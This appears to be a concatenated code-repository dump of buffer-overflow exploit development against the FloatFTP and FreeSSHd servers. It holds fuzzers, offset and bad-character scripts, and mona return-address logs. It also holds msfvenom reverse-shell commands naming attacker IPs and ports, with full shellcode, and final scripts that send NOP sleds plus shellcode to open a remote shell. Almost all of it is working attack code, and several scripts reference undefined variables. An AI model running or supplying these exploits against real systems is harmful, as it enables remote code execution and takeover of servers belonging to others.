"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9" 6 | end_buff=" HTTP/1.1\r\n\r\n" 7 | final_buff = pre_buff+buff+end_buff 8 | sock.send(final_buff) 9 | sock.recv(1024) 10 | sock.close() 11 | -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/@old/ty.py: 
-------------------------------------------------------------------------------- 1 | 2 | import socket 3 | 4 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 5 | 6 | buff = "A"*247 + "\x03\xb5\x56\x76"+"\x90"*366 7 | try: 8 | print "\nSending evil buffer..." 9 | s.connect(('192.168.1.116', 21)) 10 | s.send('GET ' + buffer + '\r\n\r\n') 11 | print s.recv(1024) 12 | s.close() 13 | print "\nDone!" 14 | except: 15 | print "Could not connect" 16 | -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/Eip_control.py: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | import sys, socket 3 | 4 | eob="\r\n\r\n" 5 | 6 | Shellcode = "A" * 248 +"B" * 4 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',21)) 10 | print "Sending data to remove server....." 11 | s.send(('GET' + Shellcode + eob)) 12 | s.close() 13 | 14 | 15 | 16 | except: 17 | print("Error in connecting") 18 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/ShellCode.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | 5 | 6 | exploit=("\xbd\x73\xb5\x8d\xec\xda\xc8\xd9\x74\x24\xf4\x5e\x29\xc9\xb1" 7 | "\x52\x31\x6e\x12\x03\x6e\x12\x83\x9d\x49\x6f\x19\x9d\x5a\xf2" 8 | "\xe2\x5d\x9b\x93\x6b\xb8\xaa\x93\x08\xc9\x9d\x23\x5a\x9f\x11" 9 | "\xcf\x0e\x0b\xa1\xbd\x86\x3c\x02\x0b\xf1\x73\x93\x20\xc1\x12" 10 | "\x17\x3b\x16\xf4\x26\xf4\x6b\xf5\x6f\xe9\x86\xa7\x38\x65\x34" 11 | "\x57\x4c\x33\x85\xdc\x1e\xd5\x8d\x01\xd6\xd4\xbc\x94\x6c\x8f" 12 | "\x1e\x17\xa0\xbb\x16\x0f\xa5\x86\xe1\xa4\x1d\x7c\xf0\x6c\x6c" 13 | "\x7d\x5f\x51\x40\x8c\xa1\x96\x67\x6f\xd4\xee\x9b\x12\xef\x35" 14 | "\xe1\xc8\x7a\xad\x41\x9a\xdd\x09\x73\x4f\xbb\xda\x7f\x24\xcf" 15 | "\x84\x63\xbb\x1c\xbf\x98\x30\xa3\x6f\x29\x02\x80\xab\x71\xd0" 16 | 
"\xa9\xea\xdf\xb7\xd6\xec\xbf\x68\x73\x67\x2d\x7c\x0e\x2a\x3a" 17 | "\xb1\x23\xd4\xba\xdd\x34\xa7\x88\x42\xef\x2f\xa1\x0b\x29\xa8" 18 | "\xc6\x21\x8d\x26\x39\xca\xee\x6f\xfe\x9e\xbe\x07\xd7\x9e\x54" 19 | "\xd7\xd8\x4a\xfa\x87\x76\x25\xbb\x77\x37\x95\x53\x9d\xb8\xca" 20 | "\x44\x9e\x12\x63\xee\x65\xf5\x4c\x47\x64\x96\x25\x9a\x66\x9c" 21 | "\x67\x13\x80\xf6\x97\x72\x1b\x6f\x01\xdf\xd7\x0e\xce\xf5\x92" 22 | "\x11\x44\xfa\x63\xdf\xad\x77\x77\x88\x5d\xc2\x25\x1f\x61\xf8" 23 | "\x41\xc3\xf0\x67\x91\x8a\xe8\x3f\xc6\xdb\xdf\x49\x82\xf1\x46" 24 | "\xe0\xb0\x0b\x1e\xcb\x70\xd0\xe3\xd2\x79\x95\x58\xf1\x69\x63" 25 | "\x60\xbd\xdd\x3b\x37\x6b\x8b\xfd\xe1\xdd\x65\x54\x5d\xb4\xe1" 26 | "\x21\xad\x07\x77\x2e\xf8\xf1\x97\x9f\x55\x44\xa8\x10\x32\x40" 27 | "\xd1\x4c\xa2\xaf\x08\xd5\xc2\x4d\x98\x20\x6b\xc8\x49\x89\xf6" 28 | "\xeb\xa4\xce\x0e\x68\x4c\xaf\xf4\x70\x25\xaa\xb1\x36\xd6\xc6" 29 | "\xaa\xd2\xd8\x75\xca\xf6") 30 | 31 | eob="\r\n\r\n" 32 | Shellcode = "A" * 248 + "\x21\x4b\x0b\x76" + "\x90" *32 +exploit 33 | 34 | try: 35 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 36 | s.connect(('192.168.1.133',21)) 37 | print "Sending data to remove server....." 
38 | s.send(('GET' + Shellcode + eob)) 39 | s.close() 40 | 41 | 42 | 43 | except: 44 | print("Error in connecting") 45 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/bad_char.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 5 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 6 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 7 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 8 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 9 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 10 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 11 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 12 | 13 | eob="\r\n\r\n" 14 | Shellcode = "A" * 248 +"B" * 4 + badchars 15 | 16 | try: 17 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 18 | s.connect(('192.168.1.133',21)) 19 | print "Sending data to remove server....." 
20 | s.send(('GET' + Shellcode + eob)) 21 | s.close() 22 | 23 | 24 | 25 | except: 26 | print("Error in connecting") 27 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/exploit_code: -------------------------------------------------------------------------------- 1 | msfvenom -p windows/shell_reverse_tcp LHOS=192.168.1.147 LPORT=1234 EXITFUNC=thread -f c -b "\x00" 2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload 3 | [-] No arch selected, selecting arch: x86 from the payload 4 | Found 11 compatible encoders 5 | Attempting to encode payload with 1 iterations of x86/shikata_ga_nai 6 | x86/shikata_ga_nai succeeded with size 351 (iteration=0) 7 | x86/shikata_ga_nai chosen with final size 351 8 | Payload size: 351 bytes 9 | Final size of c file: 1500 bytes 10 | unsigned char buf[] = 11 | "\xdb\xd1\xbb\xb1\x96\x2f\x26\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 12 | "\x52\x83\xc2\x04\x31\x5a\x13\x03\xeb\x85\xcd\xd3\xf7\x42\x93" 13 | "\x1c\x07\x93\xf4\x95\xe2\xa2\x34\xc1\x67\x94\x84\x81\x25\x19" 14 | "\x6e\xc7\xdd\xaa\x02\xc0\xd2\x1b\xa8\x36\xdd\x9c\x81\x0b\x7c" 15 | "\x1f\xd8\x5f\x5e\x1e\x13\x92\x9f\x67\x4e\x5f\xcd\x30\x04\xf2" 16 | "\xe1\x35\x50\xcf\x8a\x06\x74\x57\x6f\xde\x77\x76\x3e\x54\x2e" 17 | "\x58\xc1\xb9\x5a\xd1\xd9\xde\x67\xab\x52\x14\x13\x2a\xb2\x64" 18 | "\xdc\x81\xfb\x48\x2f\xdb\x3c\x6e\xd0\xae\x34\x8c\x6d\xa9\x83" 19 | "\xee\xa9\x3c\x17\x48\x39\xe6\xf3\x68\xee\x71\x70\x66\x5b\xf5" 20 | "\xde\x6b\x5a\xda\x55\x97\xd7\xdd\xb9\x11\xa3\xf9\x1d\x79\x77" 21 | "\x63\x04\x27\xd6\x9c\x56\x88\x87\x38\x1d\x25\xd3\x30\x7c\x22" 22 | "\x10\x79\x7e\xb2\x3e\x0a\x0d\x80\xe1\xa0\x99\xa8\x6a\x6f\x5e" 23 | "\xce\x40\xd7\xf0\x31\x6b\x28\xd9\xf5\x3f\x78\x71\xdf\x3f\x13" 24 | "\x81\xe0\x95\xb4\xd1\x4e\x46\x75\x81\x2e\x36\x1d\xcb\xa0\x69" 25 | "\x3d\xf4\x6a\x02\xd4\x0f\xfd\xed\x81\x0e\x6e\x85\xd3\x10\x94" 26 | "\x84\x5d\xf6\xfe\x38\x08\xa1\x96\xa1\x11\x39\x06\x2d\x8c\x44" 27 | 
"\x08\xa5\x23\xb9\xc7\x4e\x49\xa9\xb0\xbe\x04\x93\x17\xc0\xb2" 28 | "\xbb\xf4\x53\x59\x3b\x72\x48\xf6\x6c\xd3\xbe\x0f\xf8\xc9\x99" 29 | "\xb9\x1e\x10\x7f\x81\x9a\xcf\xbc\x0c\x23\x9d\xf9\x2a\x33\x5b" 30 | "\x01\x77\x67\x33\x54\x21\xd1\xf5\x0e\x83\x8b\xaf\xfd\x4d\x5b" 31 | "\x29\xce\x4d\x1d\x36\x1b\x38\xc1\x87\xf2\x7d\xfe\x28\x93\x89" 32 | "\x87\x54\x03\x75\x52\xdd\x23\x94\x76\x28\xcc\x01\x13\x91\x91" 33 | "\xb1\xce\xd6\xaf\x31\xfa\xa6\x4b\x29\x8f\xa3\x10\xed\x7c\xde" 34 | "\x09\x98\x82\x4d\x29\x89"; 35 | -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/fuzz.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | from time import sleep 3 | 4 | buffer ="A" * 100 5 | eob="\r\n\r\n" 6 | 7 | while True: 8 | try: 9 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 10 | s.connect(('192.168.1.133',21)) 11 | print "Trying with buffer length %d" % len(buffer) 12 | s.send(('GET' + buffer + eob)) 13 | s.close() 14 | sleep(1) 15 | buffer=buffer + "A"*100 16 | 17 | 18 | except: 19 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 20 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/offset.py: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | import sys, socket 3 | 4 | eob="\r\n\r\n" 5 | 6 | Shellcode = "A" * 248 +"B" * 4 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',21)) 10 | print "Sending data to remove server....." 
11 | s.send(('GET' + offset + eob)) 12 | s.close() 13 | 14 | 15 | 16 | except: 17 | print("Error in connecting") 18 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/ret_add: -------------------------------------------------------------------------------- 1 | Log data, item 11 2 | Address=625011AF 3 | Message= 0x625011af : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 4 | 5 | 6 | Log data, item 10 7 | Address=625011BB 8 | Message= 0x625011bb : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 9 | 10 | Log data, item 9 11 | Address=625011C7 12 | Message= 0x625011c7 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 13 | 14 | Log data, item 8 15 | Address=625011D3 16 | Message= 0x625011d3 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 17 | 18 | Log data, item 7 19 | Address=625011DF 20 | Message= 0x625011df : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 21 | 22 | Log data, item 6 23 | Address=625011EB 24 | Message= 0x625011eb : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 25 | 26 | Log data, item 5 27 | Address=625011F7 28 | Message= 0x625011f7 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 29 | 30 | Log data, item 4 31 | Address=62501203 32 | Message= 
0x62501203 : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 33 | 34 | Log data, item 3 35 | Address=62501205 36 | Message= 0x62501205 : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 37 | 38 | -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/return_add.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | "Ret address=>760B4B21" 5 | 6 | eob="\r\n\r\n" 7 | Shellcode = "A" * 248 + "\x21\x4b\x0b\x76" 8 | try: 9 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 10 | s.connect(('192.168.1.133',21)) 11 | print "Sending data to remove server....." 12 | s.send(('GET' + Shellcode + eob)) 13 | s.close() 14 | 15 | 16 | 17 | except: 18 | print("Error in connecting") 19 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/writewup: -------------------------------------------------------------------------------- 1 | Service ="FloatFTP" 2 | PORT = 21 /FTP (Anynoymous login) 3 | 4 | 5 | 1.Fuzzing and findinf bugger size 500 6 | 2. find offset via sending random string of 500 7 | 8 | EIP= > 33694132 buffer size 248 9 | 10 | 3. bad character => "\x00\x0a\x0d" 11 | 12 | 4. return addrress !mona find -s "\xff\xe4" -m shell32.dll 13 | 14 | 5. 
Exploit Shellcode = "A" * 248 + "\x21\x4b\x0b\x76" + "\x90" *32 +exploi -------------------------------------------------------------------------------- /BufferOverflow/Freesshd/Bad_char.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys, socket 4 | 5 | 6 | Pre= ("\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" 7 | "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" 8 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde") 9 | 10 | 11 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 12 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 13 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 14 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 15 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 16 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 17 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 18 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 19 | 20 | buffer = "A" * 1055 + "B" * 4 + badchars 21 | 22 | buffer += "C" * (20400-len(buffer)) 23 | 24 | 25 | eob = "\r\n" 26 | 27 | 28 | try: 29 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 30 | s.connect(('192.168.43.156',22)) 31 | print "Sending paylaod to remote server....." 
32 | s.send((Pre + buffer + eob)) 33 | s.recv(1024) 34 | s.close() 35 | 36 | except: 37 | print("unable to connect remoter server....") 38 | sys.exit() 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /BufferOverflow/Freesshd/Eip_control.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys, socket 4 | #77D2BC93 5 | 6 | 7 | Pre= ("\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" 8 | "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" 9 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde") 10 | 11 | buffer = "A" * 1055 + "\x93\xbc\xd2\x77" 12 | 13 | buffer += "C" * (20400-len(buffer)) 14 | 15 | eob = "\r\n" 16 | 17 | 18 | try: 19 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 20 | s.connect(('192.168.43.156',22)) 21 | print "Sending paylaod to remote server....." 22 | s.send((Pre + buffer + eob)) 23 | s.recv(1024) 24 | s.close() 25 | 26 | except: 27 | print("unable to connect remoter server....") 28 | sys.exit() 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /BufferOverflow/Freesshd/fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys, socket 4 | from time import sleep 5 | 6 | 7 | Pre= ("\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" 8 | "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" 9 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde") 10 | 11 | buffer = "A" * 100 12 | 13 | eob = "\r\n" 14 | 15 | 16 | while True: 17 | try: 18 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 19 | s.connect(('192.168.43.156',22)) 20 | print "Trying with buffer length %d" % len(buffer) 21 | s.send((Pre + buffer + eob)) 22 | s.recv(1024) 23 | s.close() 24 | 25 | buffer=buffer + 
"A"*100 26 | 27 | 28 | except: 29 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 30 | sys.exit() 31 | sock.send(Final ) 32 | 33 | time.sleep(5) 34 | 35 | sock.close() 36 | 37 | 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /BufferOverflow/Freesshd/offset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys, socket 4 | 5 | 6 | Pre= ("\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" 7 | "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" 8 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde") 9 | 10 | buffer = "A" * 1055 + "B" * 4 11 | 12 | buffer += "C" * (20400-len(buffer)) 13 | 14 | eob = "\r\n" 15 | 16 | 17 | try: 18 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 19 | s.connect(('192.168.43.156',22)) 20 | print "Sending paylaod to remote server....." 21 | s.send((Pre + buffer + eob)) 22 | s.recv(1024) 23 | s.close() 24 | 25 | except: 26 | print("unable to connect remoter server....") 27 | sys.exit() 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /BufferOverflow/Freesshd/shell.txt: -------------------------------------------------------------------------------- 1 | msfvenom -p windows/shell_reverse_tcp LHOS=192.168.43.223 LPORT=1234 EXITFUNC=thread -f c -b "\x00" 2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload 3 | [-] No arch selected, selecting arch: x86 from the payload 4 | Found 11 compatible encoders 5 | Attempting to encode payload with 1 iterations of x86/shikata_ga_nai 6 | x86/shikata_ga_nai succeeded with size 351 (iteration=0) 7 | x86/shikata_ga_nai chosen with final size 351 8 | Payload size: 351 bytes 9 | Final size of c file: 1500 bytes 10 | unsigned char buf[] = 11 | 12 | 13 | "\xbf\x8d\x4f\x71\xef\xda\xc5\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1" 14 | 
"\x52\x31\x7b\x12\x03\x7b\x12\x83\x66\xb3\x93\x1a\x84\xa4\xd6" 15 | "\xe5\x74\x35\xb7\x6c\x91\x04\xf7\x0b\xd2\x37\xc7\x58\xb6\xbb" 16 | "\xac\x0d\x22\x4f\xc0\x99\x45\xf8\x6f\xfc\x68\xf9\xdc\x3c\xeb" 17 | "\x79\x1f\x11\xcb\x40\xd0\x64\x0a\x84\x0d\x84\x5e\x5d\x59\x3b" 18 | "\x4e\xea\x17\x80\xe5\xa0\xb6\x80\x1a\x70\xb8\xa1\x8d\x0a\xe3" 19 | "\x61\x2c\xde\x9f\x2b\x36\x03\xa5\xe2\xcd\xf7\x51\xf5\x07\xc6" 20 | "\x9a\x5a\x66\xe6\x68\xa2\xaf\xc1\x92\xd1\xd9\x31\x2e\xe2\x1e" 21 | "\x4b\xf4\x67\x84\xeb\x7f\xdf\x60\x0d\x53\x86\xe3\x01\x18\xcc" 22 | "\xab\x05\x9f\x01\xc0\x32\x14\xa4\x06\xb3\x6e\x83\x82\x9f\x35" 23 | "\xaa\x93\x45\x9b\xd3\xc3\x25\x44\x76\x88\xc8\x91\x0b\xd3\x84" 24 | "\x56\x26\xeb\x54\xf1\x31\x98\x66\x5e\xea\x36\xcb\x17\x34\xc1" 25 | "\x2c\x02\x80\x5d\xd3\xad\xf1\x74\x10\xf9\xa1\xee\xb1\x82\x29" 26 | "\xee\x3e\x57\xfd\xbe\x90\x08\xbe\x6e\x51\xf9\x56\x64\x5e\x26" 27 | "\x46\x87\xb4\x4f\xed\x72\x5f\xb0\x5a\x57\x40\x58\x99\xa7\x7a" 28 | "\x4b\x14\x41\xe8\x7b\x71\xda\x85\xe2\xd8\x90\x34\xea\xf6\xdd" 29 | "\x77\x60\xf5\x22\x39\x81\x70\x30\xae\x61\xcf\x6a\x79\x7d\xe5" 30 | "\x02\xe5\xec\x62\xd2\x60\x0d\x3d\x85\x25\xe3\x34\x43\xd8\x5a" 31 | "\xef\x71\x21\x3a\xc8\x31\xfe\xff\xd7\xb8\x73\xbb\xf3\xaa\x4d" 32 | "\x44\xb8\x9e\x01\x13\x16\x48\xe4\xcd\xd8\x22\xbe\xa2\xb2\xa2" 33 | "\x47\x89\x04\xb4\x47\xc4\xf2\x58\xf9\xb1\x42\x67\x36\x56\x43" 34 | "\x10\x2a\xc6\xac\xcb\xee\xe6\x4e\xd9\x1a\x8f\xd6\x88\xa6\xd2" 35 | "\xe8\x67\xe4\xea\x6a\x8d\x95\x08\x72\xe4\x90\x55\x34\x15\xe9" 36 | "\xc6\xd1\x19\x5e\xe6\xf3" -------------------------------------------------------------------------------- /BufferOverflow/Freesshd/shellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys, socket 4 | 5 | 6 | Pre= ("\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" 7 | "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" 8 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde") 9 
| 10 | 11 | Shellcode=("\xbf\x8d\x4f\x71\xef\xda\xc5\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1" 12 | "\x52\x31\x7b\x12\x03\x7b\x12\x83\x66\xb3\x93\x1a\x84\xa4\xd6" 13 | "\xe5\x74\x35\xb7\x6c\x91\x04\xf7\x0b\xd2\x37\xc7\x58\xb6\xbb" 14 | "\xac\x0d\x22\x4f\xc0\x99\x45\xf8\x6f\xfc\x68\xf9\xdc\x3c\xeb" 15 | "\x79\x1f\x11\xcb\x40\xd0\x64\x0a\x84\x0d\x84\x5e\x5d\x59\x3b" 16 | "\x4e\xea\x17\x80\xe5\xa0\xb6\x80\x1a\x70\xb8\xa1\x8d\x0a\xe3" 17 | "\x61\x2c\xde\x9f\x2b\x36\x03\xa5\xe2\xcd\xf7\x51\xf5\x07\xc6" 18 | "\x9a\x5a\x66\xe6\x68\xa2\xaf\xc1\x92\xd1\xd9\x31\x2e\xe2\x1e" 19 | "\x4b\xf4\x67\x84\xeb\x7f\xdf\x60\x0d\x53\x86\xe3\x01\x18\xcc" 20 | "\xab\x05\x9f\x01\xc0\x32\x14\xa4\x06\xb3\x6e\x83\x82\x9f\x35" 21 | "\xaa\x93\x45\x9b\xd3\xc3\x25\x44\x76\x88\xc8\x91\x0b\xd3\x84" 22 | "\x56\x26\xeb\x54\xf1\x31\x98\x66\x5e\xea\x36\xcb\x17\x34\xc1" 23 | "\x2c\x02\x80\x5d\xd3\xad\xf1\x74\x10\xf9\xa1\xee\xb1\x82\x29" 24 | "\xee\x3e\x57\xfd\xbe\x90\x08\xbe\x6e\x51\xf9\x56\x64\x5e\x26" 25 | "\x46\x87\xb4\x4f\xed\x72\x5f\xb0\x5a\x57\x40\x58\x99\xa7\x7a" 26 | "\x4b\x14\x41\xe8\x7b\x71\xda\x85\xe2\xd8\x90\x34\xea\xf6\xdd" 27 | "\x77\x60\xf5\x22\x39\x81\x70\x30\xae\x61\xcf\x6a\x79\x7d\xe5" 28 | "\x02\xe5\xec\x62\xd2\x60\x0d\x3d\x85\x25\xe3\x34\x43\xd8\x5a" 29 | "\xef\x71\x21\x3a\xc8\x31\xfe\xff\xd7\xb8\x73\xbb\xf3\xaa\x4d" 30 | "\x44\xb8\x9e\x01\x13\x16\x48\xe4\xcd\xd8\x22\xbe\xa2\xb2\xa2" 31 | "\x47\x89\x04\xb4\x47\xc4\xf2\x58\xf9\xb1\x42\x67\x36\x56\x43" 32 | "\x10\x2a\xc6\xac\xcb\xee\xe6\x4e\xd9\x1a\x8f\xd6\x88\xa6\xd2" 33 | "\xe8\x67\xe4\xea\x6a\x8d\x95\x08\x72\xe4\x90\x55\x34\x15\xe9" 34 | "\xc6\xd1\x19\x5e\xe6\xf3") 35 | 36 | buffer = "A" * 1055 + "\x93\xbc\xd2\x77"+ "\x90" * 25 + Shellcode 37 | 38 | buffer += "C" * (20400-len(buffer)) 39 | 40 | 41 | eob = "\r\n" 42 | 43 | 44 | try: 45 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 46 | s.connect(('192.168.43.156',22)) 47 | print "Sending paylaod to remote server....." 
